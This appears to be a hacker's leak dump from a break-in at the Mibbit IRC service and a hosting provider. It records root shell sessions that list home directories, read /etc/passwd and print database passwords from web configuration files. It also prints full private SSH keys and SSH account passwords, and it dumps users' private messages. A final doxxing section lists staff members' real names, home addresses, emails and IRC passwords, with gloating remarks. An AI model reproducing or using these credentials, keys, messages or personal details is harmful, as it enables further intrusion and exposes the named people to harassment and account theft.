-rw-r--r-- 1 wwwadmin wwwadmin 5014 Aug 7 20:51 .bash_history
-rw-r--r-- 1 wwwadmin wwwadmin 220 Apr 19 2010 .bash_logout
-rw-r--r-- 1 wwwadmin wwwadmin 3136 Aug 7 17:39 .bashrc
drwx------ 2 wwwadmin wwwadmin 4096 Mar 15 20:10 .cache
-rw-r--r-- 1 wwwadmin wwwadmin 19 Jan 29 2009 .hercpw
-rw-r--r-- 1 wwwadmin wwwadmin 148 Apr 11 2010 .htpasswd
-rw------- 1 wwwadmin wwwadmin 177 Aug 6 15:34 .lesshst
-rw------- 1 wwwadmin wwwadmin 214 Mar 16 20:20 .mysql_history
-rw------- 1 wwwadmin wwwadmin 55 Mar 16 18:19 .php_history
-rw-r--r-- 1 wwwadmin wwwadmin 700 Mar 15 20:55 .profile
-rw-r--r-- 1 wwwadmin wwwadmin 66 Mar 31 16:37 .selected_editor
drwx------ 2 wwwadmin wwwadmin 4096 Mar 15 20:53 .ssh
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Mar 15 21:20 .vim
-rw------- 1 wwwadmin wwwadmin 13346 Aug 12 16:13 .viminfo
-rw-r--r-- 1 wwwadmin wwwadmin 4425 Mar 15 20:53 .vimrc
-rw-r--r-- 1 wwwadmin wwwadmin 993262 Mar 31 14:46 eggdrop1.6.20.tar.bz2
drwxr-xr-x 6 wwwadmin wwwadmin 4096 Apr 16 15:01 kenneth
drwxr-xr-x 10 wwwadmin wwwadmin 4096 Aug 13 02:00 loggerbot
-rw-r--r-- 1 wwwadmin wwwadmin 45 Apr 5 20:40 test.php
root () tools:~# ls -al /OLD_DATA
total 132
drwxrwxrwx 20 root root 4096 Aug 6 23:14 .
drwxr-xr-x 22 root root 4096 Mar 15 22:22 ..
drwxr-xr-x 2 root root 4096 Mar 15 10:46 bin
drwxr-xr-x 2 root root 4096 Oct 20 2008 boot
drwxr-xr-x 4 root root 8192 Mar 15 09:49 dev
drwxr-xr-x 76 root root 4096 Mar 15 10:46 etc
drwxr-xr-x 5 root root 4096 Jan 12 2009 home
drwxr-xr-x 12 root root 8192 Mar 15 10:46 lib
drwx------ 2 root root 16384 Nov 25 2008 lost+found
drwxr-xr-x 2 root root 4096 Nov 25 2008 media
drwxr-xr-x 2 root root 4096 Oct 20 2008 mnt
drwxr-xr-x 2 root root 4096 Nov 25 2008 opt
drwxr-xr-x 2 root root 4096 Oct 20 2008 proc
drwxr-xr-x 3 root root 4096 Mar 7 22:29 root
drwxr-xr-x 2 root root 4096 Mar 15 10:46 sbin
-rw------- 1 root root 31903 Jan 12 2009 sql0swW3A
drwxr-xr-x 2 root root 4096 Nov 25 2008 srv
drwxr-xr-x 2 root root 4096 Oct 14 2008 sys
drwxrwxrwt 4 root root 4096 Mar 15 09:49 tmp
drwxr-xr-x 11 root root 4096 Dec 9 2008 usr
drwxr-xr-x 15 root root 4096 Dec 17 2008 var
root () tools:~# ls -al /OLD_DATA/home
total 20
drwxr-xr-x 5 root root 4096 Jan 12 2009 .
drwxrwxrwx 20 root root 4096 Aug 6 23:14 ..
drwxr-xr-x 13 1001 1001 4096 Mar 15 10:46 ircadmin
drwxr-xr-x 4 wwwadmin wwwadmin 4096 Oct 12 2009 mibbit
drwxr-xr-x 8 1002 1002 4096 Mar 15 09:29 wwwadmin
root () tools:~# ls -al /OLD_DATA/home/ircadmin/ # ALL YOUR IRCD ARE BELONG TO US
total 146816
drwxr-xr-x 13 1001 1001 4096 Mar 15 10:46 .
drwxr-xr-x 5 root root 4096 Jan 12 2009 ..
-rw------- 1 1001 1001 14707 Mar 14 23:29 .bash_history
-rw-r--r-- 1 1001 1001 220 May 12 2008 .bash_logout
-rw-r--r-- 1 1001 1001 3115 May 12 2008 .bashrc
-rw------- 1 1001 1001 41 Jun 1 2010 .lesshst
-rw------- 1 1001 1001 256 Mar 12 14:44 .nano_history
-rw-r--r-- 1 1001 1001 675 May 12 2008 .profile
drwxr-xr-x 2 1001 1001 4096 Mar 7 23:44 .ssh
-rw------- 1 1001 1001 821 May 21 2009 .viminfo
drwxr-xr-x 13 1001 1001 4096 Jan 5 2010 Unreal3.2.7
drwx------ 13 1001 1001 4096 Apr 13 2009 Unreal3.2.8
drwx------ 13 1001 1001 4096 Dec 22 2010 Unreal3.2.8.1
-rw-r--r-- 1 1001 1001 8181760 Sep 9 2009 Unreal3.2.8.1.tar
-rw-r--r-- 1 1001 1001 8181760 Apr 7 2009 Unreal3.2.8.tar
drwxr-xr-x 7 1001 1001 4096 Feb 3 2009 anope-1.8.0-rc1
drwxr-xr-x 8 1001 1001 4096 Jan 7 2009 bopm
drwxr-xr-x 5 1001 1001 4096 Jan 7 2009 bopm-3.1.3
-rw------- 1 1001 1001 1475 Jul 30 2009 dead.letter
drwxr-xr-x 2 1001 1001 8192 Mar 12 14:44 dronebl
drwxr-xr-x 3 1001 1001 4096 May 4 2009 hub
drwxr-xr-x 9 1001 1001 4096 Mar 15 10:46 infobot-0.45.3
-rw-r--r-- 1 1001 1001 81 Jan 26 2010 irc.us.mibbit.net.txt
-rw-r--r-- 1 1001 1001 132744770 Feb 28 2010 ircd.tgz
-rw-r--r-- 1 1001 1001 623 Oct 27 2009 jim
-rw------- 1 1001 1001 949701 Feb 8 2010 mbox
drwxr-xr-x 7 1001 1001 4096 Jan 26 2010 services
:: 0x03 - PM logs - tools.mibbit.com ::
root () tools:~# mysql -u root -ped4e5c6e88e5
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 95641
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use www;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select concat(fromNick,' -> ',toNick,': ',data) from pmlogs;
jared -> molkmin: can the admins tell when users PM each other on this network?
jared -> molkmin: (with mibbit)
molkmin -> jared: who do you wnat to know is saying what?
jared -> molkmin: but they don't have to know that :)
karma motherfuck3r
molkmin -> alpha: not that I can see
molkmin -> alpha: I wasn't watching
molkmin -> alpha: it hardly matters :)
alpha -> molkmin: just silenced them
alpha -> molkmin: :)
molkmin -> alpha: everyone in #chat is assholes :)
alpha -> molkmin: lol
alpha -> molkmin: thanks
thX
jared -> molkmin: i've seen some scary botnets on dalnet
jared -> molkmin: they could knock you off the server in less than a second
molkmin -> jared: I've never had that happen yet
molkmin -> jared: I have a mac
??
jared -> molkmin: VNCing into a linux box
jared -> molkmin: with a windows virtualbox guest
jared -> molkmin: to use the VPN
jared -> molkmin: to connect to a terminal server at work
jared -> molkmin: friggin ridiculous
molkmin -> jared: get a freaking mac
jared -> molkmin: how would that help?
...
[h () ck ~]$ wc mibbitpms.out
51610 493903 2955301 mibbitpms.out
[h () ck ~]$ wc mibbitchanmsgs.out
622607 4558597 32539145 mibbitchanmsgs.out
f1les @ 0x07 <<<
:: 0x04 - status.mibbit.com ::
[h () ck ~]$ ssh wwwadmin () status mibbit com
wwwadmin () status mibbit com's password:
Last login: Fri Aug 12 21:18:51 2011 from [redacted]
wwwadmin () status:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false
mibbit:x:1000:1000::/home/mibbit:/bin/bash
wwwadmin:x:1001:1001::/home/wwwadmin:/bin/bash
zfreebies:x:1002:1002::/home/zfreebies:/bin/bash
smmta:x:105:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:106:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
jimmy:x:1003:1003::/home/jimmy:/bin/bash
bind:x:107:109::/var/cache/bind:/bin/false
wwwadmin () status:~$ ls -alt /
total 92
drwxrwxrwt 4 root root 4096 Aug 13 07:25 tmp
drwxr-xr-x 78 root root 4096 Aug 13 01:14 etc
drwxr-xr-x 21 root root 4096 Jul 7 07:40 .
drwxr-xr-x 21 root root 4096 Jul 7 07:40 ..
drwxr-xr-x 11 root root 12760 Jul 7 07:40 dev
drwxr-xr-x 11 root root 0 Jul 7 07:40 sys
dr-xr-xr-x 99 root root 0 Jul 7 07:40 proc
drwxr-xr-x 2 root root 4096 May 29 23:11 bin
drwxr-xr-x 15 root root 12288 May 29 23:11 lib
drwx------ 3 root root 4096 May 29 23:11 root
drwxr-xr-x 2 root root 4096 Nov 6 2010 sbin
drwxr-xr-x 6 root root 4096 Mar 4 2010 home
drwxr-xr-x 11 root root 4096 Sep 30 2009 usr
drwxr-xr-x 14 root root 4096 Aug 11 2009 var
drwxr-xr-x 2 root root 4096 Apr 23 2009 media
drwxr-xr-x 2 root root 4096 Apr 23 2009 opt
drwxr-xr-x 2 root root 4096 Apr 23 2009 srv
drwx------ 2 root root 16384 Apr 23 2009 lost+found
drwxr-xr-x 2 root root 4096 Apr 13 2009 boot
drwxr-xr-x 2 root root 4096 Apr 13 2009 mnt
drwxr-xr-x 2 root root 4096 Mar 6 2009 selinux
wwwadmin () status:~$ ls -alt /home
total 24
drwxr-xr-x 6 wwwadmin wwwadmin 4096 Aug 12 21:44 wwwadmin
drwxr-xr-x 21 root root 4096 Jul 7 07:40 ..
drwxr-xr-x 7 mibbit mibbit 4096 Jun 29 13:30 mibbit
drwxr-xr-x 4 zfreebies zfreebies 4096 Apr 29 2010 zfreebies
drwxr-xr-x 3 jimmy jimmy 4096 Mar 8 2010 jimmy
drwxr-xr-x 6 root root 4096 Mar 4 2010 .
wwwadmin () status:~$ ls -alt
total 52
drwxr-xr-x 6 wwwadmin wwwadmin 4096 Aug 12 21:44 .
-rw------- 1 wwwadmin wwwadmin 1979 Aug 12 21:44 .mysql_history
-rw------- 1 wwwadmin wwwadmin 120 Aug 12 05:15 .nano_history
drwxrwxrwx 2 wwwadmin wwwadmin 4096 Aug 7 18:29 .ssh
-rw------- 1 wwwadmin wwwadmin 6566 Aug 7 15:02 .bash_history
drwxr-xr-x 3 wwwadmin wwwadmin 4096 Jan 26 2011 wiki_new
drwxr-xr-x 4 wwwadmin wwwadmin 4096 Jan 25 2011 wiki_backup_25Jan
lrwxrwxrwx 1 root root 31 Jan 17 2011 blog -> /var/www/blog.mibbit.com/htdocs
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Dec 10 2010 WP_BACKUP
drwxr-xr-x 6 root root 4096 Mar 4 2010 ..
lrwxrwxrwx 1 wwwadmin wwwadmin 32 Sep 13 2009 wiki -> /var/www/wiki.mibbit.com/htdocs/
-rw-r--r-- 1 wwwadmin wwwadmin 220 Mar 2 2009 .bash_logout
-rw-r--r-- 1 wwwadmin wwwadmin 3115 Mar 2 2009 .bashrc
-rw-r--r-- 1 wwwadmin wwwadmin 675 Mar 2 2009 .profile
wwwadmin () status:~$ ls -alt /var/www/
total 56
drwxr-xr-x 4 root root 4096 May 12 2010 www.stopitmovies.com
drwxr-xr-x 13 root root 4096 May 12 2010 .
drwxr-xr-x 4 root root 4096 Mar 24 2010 status.mibbit.com
drwxr-xr-x 4 root root 4096 Mar 16 2010 a.mibbit.com
drwxr-xr-x 6 root root 4096 Feb 19 2010 blog.mibbit.com
drwxr-xr-x 4 root root 4096 Dec 23 2009 adminwiki.mibbit.com
drwxr-xr-x 4 root root 4096 Oct 12 2009 www.rollered.com
drwxr-xr-x 4 root root 4096 Oct 12 2009 www.wizzig.com
drwxr-xr-x 4 www-data www-data 4096 Oct 12 2009 www.axod.net
drwxr-xr-x 5 root root 4096 Sep 30 2009 www.zfreebies.com
drwxr-xr-x 5 root root 4096 Sep 15 2009 forum.zfreebies.co.uk
drwxrwxr-x 5 www-data www-data 4096 Sep 13 2009 wiki.mibbit.com
-rw-r--r-- 1 root root 45 Aug 11 2009 index.html
drwxr-xr-x 14 root root 4096 Aug 11 2009 ..
wwwadmin () status:~$ cat /var/www/a.mibbit.com/htdocs/admin/index.php | head -n 3
<?
$sql = @mysql_connect("127.0.0.1", "advertuser", "e5e32f36aa88");
@mysql_select_db("adverts", $sql);
wwwadmin () status:~$ cat /var/www/a.mibbit.com/htdocs/sessionError.php | head -n 3
<?
$sql = @mysql_connect("127.0.0.1", "root", "5068c8055ffc");
wwwadmin () status:~$ ls -alt /var/www/blog.mibbit.com/htdocs
total 308
drwxr-xr-x 5 wwwadmin wwwadmin 4096 Nov 15 2010 .
-rw-r--r-- 1 wwwadmin www-data 655 Nov 15 2010 favicon.ico
drwxr-xr-x 5 wwwadmin www-data 4096 Feb 23 2010 wp-content
-rw-r--r-- 1 wwwadmin www-data 1548 Feb 19 2010 wp-config.php
-rw-r--r-- 1 wwwadmin www-data 93445 Feb 19 2010 xmlrpc.php
-rw-r--r-- 1 wwwadmin www-data 23097 Feb 19 2010 wp-settings.php
-rw-r--r-- 1 wwwadmin www-data 3693 Feb 19 2010 wp-trackback.php
-rw-r--r-- 1 wwwadmin www-data 218 Feb 19 2010 wp-rss.php
-rw-r--r-- 1 wwwadmin www-data 220 Feb 19 2010 wp-rss2.php
-rw-r--r-- 1 wwwadmin www-data 7578 Feb 19 2010 wp-mail.php
-rw-r--r-- 1 wwwadmin www-data 487 Feb 19 2010 wp-pass.php
-rw-r--r-- 1 wwwadmin www-data 218 Feb 19 2010 wp-rdf.php
-rw-r--r-- 1 wwwadmin www-data 316 Feb 19 2010 wp-register.php
-rw-r--r-- 1 wwwadmin www-data 2341 Feb 19 2010 wp-load.php
-rw-r--r-- 1 wwwadmin www-data 22721 Feb 19 2010 wp-login.php
drwxr-xr-x 6 wwwadmin www-data 4096 Feb 19 2010 wp-includes
-rw-r--r-- 1 wwwadmin www-data 1946 Feb 19 2010 wp-links-opml.php
-rw-r--r-- 1 wwwadmin www-data 220 Feb 19 2010 wp-feed.php
-rw-r--r-- 1 wwwadmin www-data 1253 Feb 19 2010 wp-cron.php
-rw-r--r-- 1 wwwadmin www-data 238 Feb 19 2010 wp-commentsrss2.php
-rw-r--r-- 1 wwwadmin www-data 2616 Feb 19 2010 wp-config-sample.php
-rw-r--r-- 1 wwwadmin www-data 40400 Feb 19 2010 wp-app.php
-rw-r--r-- 1 wwwadmin www-data 220 Feb 19 2010 wp-atom.php
-rw-r--r-- 1 wwwadmin www-data 274 Feb 19 2010 wp-blog-header.php
-rw-r--r-- 1 wwwadmin www-data 3928 Feb 19 2010 wp-comments-post.php
drwxr-xr-x 8 wwwadmin www-data 4096 Feb 19 2010 wp-admin
-rw-r--r-- 1 wwwadmin www-data 15410 Feb 19 2010 license.txt
-rw-r--r-- 1 wwwadmin www-data 7644 Feb 19 2010 readme.html
-rw-r--r-- 1 wwwadmin www-data 397 Feb 19 2010 index.php
drwxr-xr-x 6 root root 4096 Feb 19 2010 ..
wwwadmin () status:~$ cat /var/www/blog.mibbit.com/htdocs/wp-config.php | head -n 8
<?php
// ** MySQL settings ** //
define('DB_NAME', 'wpblog'); // The name of the database
define('DB_USER', 'wpuser'); // Your MySQL username
define('DB_PASSWORD', '13c3cada3921'); // ...and password
define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
wwwadmin () status:~$ ls -alt /var/www/wiki.mibbit.com/htdocs/
total 720
-rw-rw-r-- 1 www-data www-data 6960 Mar 21 12:46 LocalSettings.php
drwxrwxr-x 9 www-data www-data 4096 Mar 21 12:41 extensions
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Jan 26 2011 SpamBlacklist
drwxrwxr-x 17 www-data www-data 4096 Jan 26 2011 .
drwxrwxr-x 22 www-data www-data 4096 Jan 26 2011 images
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 bin
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 config
drwxrwxr-x 4 www-data www-data 4096 Jan 26 2011 docs
drwxrwxr-x 17 www-data www-data 4096 Jan 26 2011 includes
drwxrwxr-x 4 www-data www-data 4096 Jan 26 2011 languages
drwxrwxr-x 13 www-data www-data 12288 Jan 26 2011 maintenance
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 math
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 serialized
drwxrwxr-x 10 www-data www-data 4096 Jan 26 2011 skins
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Jan 4 2011 cache
-rw-r--r-- 1 wwwadmin wwwadmin 59433 Jan 4 2011 RELEASE-NOTES
-rw-r--r-- 1 wwwadmin wwwadmin 2090 Jan 4 2011 CREDITS
-rw-r--r-- 1 wwwadmin wwwadmin 8821 Jan 4 2011 profileinfo.php
-rw-rw-r-- 1 root root 655 Nov 15 2010 favicon.ico
-rw-r--r-- 1 wwwadmin wwwadmin 13307 Mar 25 2010 UPGRADE
-rw-r--r-- 1 wwwadmin wwwadmin 392287 Mar 12 2010 HISTORY
-rw-r--r-- 1 wwwadmin wwwadmin 4905 Mar 8 2010 thumb.php
-rw-r--r-- 1 wwwadmin wwwadmin 4707 Feb 15 2010 api.php
-rw-r--r-- 1 wwwadmin wwwadmin 174 Feb 3 2010 php5.php5
-rw-r--r-- 1 wwwadmin wwwadmin 89 Feb 3 2010 redirect.phtml
-rw-r--r-- 1 wwwadmin wwwadmin 86 Feb 3 2010 wiki.phtml
-rw-r--r-- 1 wwwadmin wwwadmin 4329 Jan 1 2010 index.php
-rw-r--r-- 1 wwwadmin wwwadmin 4031 Oct 14 2009 img_auth.php
-rw-rw-r-- 1 www-data www-data 9416 Sep 13 2009 mibbit.png
-rw-rw-r-- 1 www-data www-data 1049 Sep 13 2009 AdminSettings.php
drwxrwxr-x 5 www-data www-data 4096 Sep 13 2009 ..
-rw-r--r-- 1 wwwadmin wwwadmin 76 Jul 27 2009 FAQ
drwxrwxr-x 4 www-data www-data 4096 Jul 13 2009 t
drwxrwxr-x 2 www-data www-data 4096 Jul 13 2009 tests
-rw-r--r-- 1 wwwadmin wwwadmin 648 May 7 2009 StartProfiler.sample
-rw-rw-r-- 1 www-data www-data 3952 Mar 21 2009 install-utils.inc
-rw-r--r-- 1 wwwadmin wwwadmin 3054 Mar 21 2009 opensearch_desc.php
-rw-r--r-- 1 wwwadmin wwwadmin 383 Mar 21 2009 redirect.php
-rw-r--r-- 1 wwwadmin wwwadmin 32 Mar 16 2009 trackback.php5
-rw-rw-r-- 1 www-data www-data 603 Jan 7 2009 StartProfiler.php
-rw-r--r-- 1 wwwadmin wwwadmin 3649 Nov 11 2008 README
-rw-r--r-- 1 wwwadmin wwwadmin 1347 Nov 5 2008 trackback.php
-rw-r--r-- 1 wwwadmin wwwadmin 4138 Apr 18 2008 INSTALL
-rw-rw-r-- 1 www-data www-data 618 Apr 11 2008 Makefile
-rw-r--r-- 1 wwwadmin wwwadmin 39 Mar 3 2008 opensearch_desc.php5
-rw-r--r-- 1 wwwadmin wwwadmin 25 Feb 4 2008 api.php5
-rw-r--r-- 1 wwwadmin wwwadmin 31 Feb 4 2008 img_auth.php5
-rw-r--r-- 1 wwwadmin wwwadmin 28 Feb 4 2008 index.php5
-rw-r--r-- 1 wwwadmin wwwadmin 31 Feb 4 2008 redirect.php5
-rw-r--r-- 1 wwwadmin wwwadmin 29 Feb 4 2008 thumb.php5
-rw-r--r-- 1 wwwadmin wwwadmin 17997 Apr 5 2006 COPYING
wwwadmin () status:~$ cat /var/www/wiki.mibbit.com/htdocs/LocalSettings.php | grep "password" -C 5
$wgDBtype = "mysql";
$wgDBserver = "localhost";
$wgDBname = "wikidb";
$wgDBuser = "wikiuser";
$wgDBpassword = "a69e74574db6";
$wgDBport = "5432";
$wgDBprefix = "";
$wgDBadminuser = "wikiuser";
$wgDBadminpassword = "a69e74574db6";
# Schemas for Postgres
$wgDBmwschema = "mediawiki";
$wgDBts2schema = "public";
wwwadmin () status:~$ cat /var/www/adminwiki.mibbit.com/htdocs/LocalSettings.php | grep "password" -C 5
## Database settings
$wgDBtype = "mysql";
$wgDBserver = "localhost";
$wgDBname = "wikiadmindb";
$wgDBuser = "wikiadminuser";
$wgDBpassword = "fe102b0d7793";
# MySQL specific settings
$wgDBprefix = "";
# MySQL table options to use during installation or update
wwwadmin () status:~$ exit
Connection to status.mibbit.com closed.
:: 0x05 - sidewinder.netonecom.net ::
backup () sidewinder ~> ls -al # read world backups of all servers with /etc/shadow ROFL
total 596
drwxr-xr-x 16 backup root 432 2011-08-12 18:52 .
drwxr-xr-x 26 root root 632 2011-05-12 14:12 ..
drwxr-xr-x 2 backup users 1344 2009-08-27 10:44 amram
drwxr-xr-x 2 root root 587920 2011-08-13 12:37 awstats
-rw------- 1 backup 1452 17 2006-09-18 14:47 .bash_history
drwxr-xr-x 2 backup users 224 2009-10-07 12:58 hornet
drwxr-xr-x 2 backup users 1336 2010-08-24 11:23 ice
drwxr-xr-x 2 backup users 1216 2010-11-12 16:07 janco
drwxr-xr-x 3 backup users 264 2011-08-13 01:27 magic
drwxr-xr-x 3 backup users 1416 2011-07-26 12:32 merlin
drwxr-xr-x 2 backup users 1432 2011-05-16 05:55 multimag
drwxr-xr-x 2 backup users 1640 2010-10-11 15:49 phantom
drwxr-xr-x 2 backup users 1680 2011-01-13 15:57 sidewinder
drwx------ 2 backup users 320 2011-08-12 18:52 .ssh
drwxr-xr-x 2 backup users 1176 2009-10-14 10:52 sydex
-rw------- 1 backup 1452 4999 2011-08-12 18:52 .viminfo
backup () sidewinder ~/.ssh> cat id_dsa id_rsa # not identity, its not ASCII
-----BEGIN DSA PRIVATE KEY-----
MIIDPwIBAAKCAQEA1KnQoLv0drmXUon9nIZUlXhQ7f6iMU0o5xlpbUg0Kwx5cXVB
mhn4gsr4CDk49+fYr29tuHn0NycY2lwuaMUV2yP15Pd05Wx/jgYgKTdaqZaZaIPX
OXbGAdFz3cd13g5pTAwDLblNp6gI4PlcXO/adN1ywOyLzVCmPHcBZqevPLMcL52v
b2ECeBuXKU5Z9leFoOF9IdkhZXTnsvj/yFLy8ZMpBD5JUyCXTfXw7cZZUko1X5wg
1lN76c+A0JKm0cMq8+NvA8ufRaGL2FXUv3McljrcTaRXMksWG3Z/KxEHsh3UY+pH
iNFESYED0jl4o84P6GLIxr7hlqQxpV0TyhwCiQIVALmyxXXqqqrEa83KyCyz557b
qdaLAoIBAQC3+GjuKabODKLSiRAgngwq88L1OJ45HtXyLIBudHLky0JM/nbUVx4f
coQip4jeLx17cMHK7Q/8gY13O81eQe8+IZ2De94PFL2troDsEW28R+7LOKcvidWp
+y2edoU77+/p2aLBUwmiYxlcmX1+w0iH/U/eMZUjtQJ6rawWFnaykBUazZjFNQdn
ZNusvxa4SKOf9Nx5qyXwSW52gqd1dNnrJFu0C10p3Y6ErllVwp5iUTAPPlOeGFnD
hoeu9FiLMVmJHzmiNDLCr6koBkEv+xQl6aL3DQRC7PymyYitltXTf1bf49kDrMWC
7BWuV3PD2pStnu1APfBALYI4DYplfO8MAoIBAQCRKSygD8aMdX83qgMCM6tphVun
snCtDZXhqLpx70aQvgZWoKYQLzdjdcicdSn9JtiWiUOzeS9A4ee5pizMwQOcbn1R
mnwIJe+36EwvCB1nhcwClGJz1ZFVR3JjMJAWob4LkYKnWPjvbLotjr1nMwCKyYRp
swTW1YZFfmodQkoPwdZ4dNKAyxxbLtWCL//l0WlTuzAfVTV4xxI/+BcfaxwW8O9W
XGj/dQwT8TjSqSUlJ2o5S6NX1tD0CmpfJ6JhcEIhAgcO2D2H15h+SZQCGkTB5Lx6
yI4A1msNuosa2+e8txxkoFZ/zIN2EdSqI5nkybOEpq971I8y1ieYtN0bH1MlAhRm
ovpJJvoWRqPg6WS+lyV49RWzMw==
-----END DSA PRIVATE KEY-----
-----BEGIN RSA PRIVATE KEY-----
MIIEoAIBAAKCAQEA43hMo7RV/7O4jNNzcGLrA2NA7kzA3RkcYnNw/lX2iJd0qR2n
a+GEySa/RtAbRRrxTDRgQ4H4LvrNGttoRIUS6gsMNpC4jxHUhzdYQikedNUNEA81
Ro7qMOULpRy9eoE0kntWIxyi5lpoSKR67KEkfhoChSe3ZEa0HqGumGWvhKJIdNtZ
Rd3GJc9HvzIr5rKxgmw4oQP9AHhhuwHTmVVLpkCI+eL8uemH+Bp8BHGNXZ4RtN50
oFB+09vtTfgCELYtAjZf6LQMCqdu6wLDx6VPxz1L6ukSoU6Oljka7Ktxjd9YR/ZU
dbmORCArArxW606rbLa9vspcWXpWBbNEwyiCXQIBIwKCAQBUfSPHxqOZfUSMFAZO
UKBu+PrcKyMQSyfMy8riH+3a9m0o3yDtjkdDZinJ2ESko5t0E3Q2VNiGemlwYB9p
6EjalmOfPRFZtipeG970AKTpkPY5KjhcCTJp7qyNyNip2DgZJn8UWxfvKOTnyBBm
hP7tAli1HWFfwn1qdpFOjCs/484Gryp0q+WFdrNrPJ1/8zqAUyqJj0cTXv6Pyeyl
RGkFmggFQgjhT/+rlrbqreMaiUMxUT2GjlvDNATrIydQVFyxIuF2El5lTVRWzV0m
rxTLTzxmZkgum+ANEC5pBNqGiTkPa2sCvRC3gtKmaZmFh6bv2/bbFOYCOEyHMfML
tQLPAoGBAPVaMLkmuQW+CUfGb+qCz/pHxDVG0Vj97GFgs1eIoskn5/3CSX9tkkTV
mKHQ3cFiV0QJWyy0MQOCTzC/yHPRj0DrZqsnOVufc1HVIADck1NKBVcXUyhRlbcB
1qW3IXeagr+lmZeVB+8WtM3oD9d8HY+Gvx+4O8ES9Am85kGfuQ8TAoGBAO1XcJBH
fVZ2mhzrvJlaLHwv730i6/hYPXphB3UYq48gfsRkhT4BbDBUiZ7201TbN7ZOHrX4
AqumdtayqYbdCLd0+6SDmAELsrAsMAM0JuvjsWXnR3a+i1T7D4Iay62c13UqFCae
PnIrqK/Qy0SRiNCbRPG4uM2PUS96Wjm1JabPAoGAfi5iM1W+PXetAFdswb+eKPG1
XTpdCTIhy64TFxMR48thXe7j+GQ8mG3Zd8qArJj5rfYu48piWZN5LwOLqUczuvy4
dUdfU7EWvF76hBmq2mCVCDfhn7Tt6Rbjayr7RNMeq7RAXJXJkOcbKBDyNE51mkVM
WXSxBDWiE6L6Ex7xdXcCgYA9B9sdyT18oiehCWsC3Kxacrns+lnvZyXAYhfcSCwd
fWJtA+e/fLVrg3PYa1rp7zo2MVharX0HkTSAWdPSONZbD3PoeZwdhqpKjwUII1p3
K+vJvyEBRvCg0tgaJCW+7dEA3u89IWCDwhVvCc3ebpDlLz2dPiDkZq557EMWJ0Qy
NQKBgFpovHwPC5k1bX9y2Sv7J+YgIiDgELsOxF9UQzWFzb1XCPczUA027RZTgLJX
ILQi0R8af8yCpxN3PUSQXtWwZXZMJZF9puFM2vXRe1Xd3kuZg4BEkoVtB5hYK5oE
yqzQAbROM2rLILM6Bj+zro5IApDQxJ4FokvNfhJm2JzdiSmo
-----END RSA PRIVATE KEY-----
jared () sidewinder netonecom net weJAruSE
http://www.2shared.com/file/-gqbHglO/jared.html (NicE priv8 keyz ;))
trix () sidewinder netonecom net trix4kids
molkmin -> jared: ah, you plan on lettingothers ssh in?
jared -> molkmin: no i thought you did
molkmin -> jared: hell no.
jared -> molkmin: okay well then forget what i said
molkmin -> jared: there are like 5 people that can ssh into sidewinder
molkmin -> jared: or maybe 7
jared -> molkmin: and only 2 of them are convicted felons
molkmin -> jared: I just recently secured SSH
jared -> molkmin: ahh so it won't allow IPs other than ours <<< You use open proxies too?
molkmin -> jared: got hacked..user used an account name of "test" password "test" <<< LOL
jared -> molkmin: grr
:: 0x06 - d0x ::
Axod
Name: Jimmy Moore
Location: Probably out of the UK
NickServ: axod:383cf3a3f7c2
Oper: axod:ce18da2ddae4
Email: jimmy.moore () gmail com
Email2: jimmy () axod net
Email3: axod () axod net
Email4: axodmedia () gmail com
Mugshot: http://a1.twimg.com/profile_images/71426235/Photo_175.jpg
http://bizzy.co.uk/uk/05956691/axod-media
http://twitter.com/#!/mibbit
http://twitter.com/#!/axod
http://digg.com/axod
http://axod.blogspot.com/
Azander
Name: Alanon Zander
Address: 2132 South 29 Rd Cadillac, MI 49601
NickServ: Azander:kikicat
Oper: azander:flagon3
Email: alanonzander () gmail com <<< kikicat
Email2: alanonzander () yahoo com <<< password recovery sends back to gmail LOL
https://plus.google.com/113170461621014873855/posts
http://www.myspace.com/alanonzander
http://user.netonecom.net/~azander/alanon.htm
Havvy
Name: Ryan Havvy
Age: 18?
Address: Somewhere in Washougal, WA
NickServ: Havvy:hmagic
Oper: havvy:hknight
Email: ryan.havvy () gmail com
http://twitter.com/#!/havvy
http://havvy.wordpress.com/
http://www.stumbleupon.com/stumbler/Havvy/
havvy havvy
xkcd.com/936/ Password security explained in a couple panels.
10 Aug ^^^ coming from someone whose passwords are 6 lowercase characters?? hahahah
Hercule
Name: Jürgen Wind
Location: Germany
NickServ: Hercule:herc47
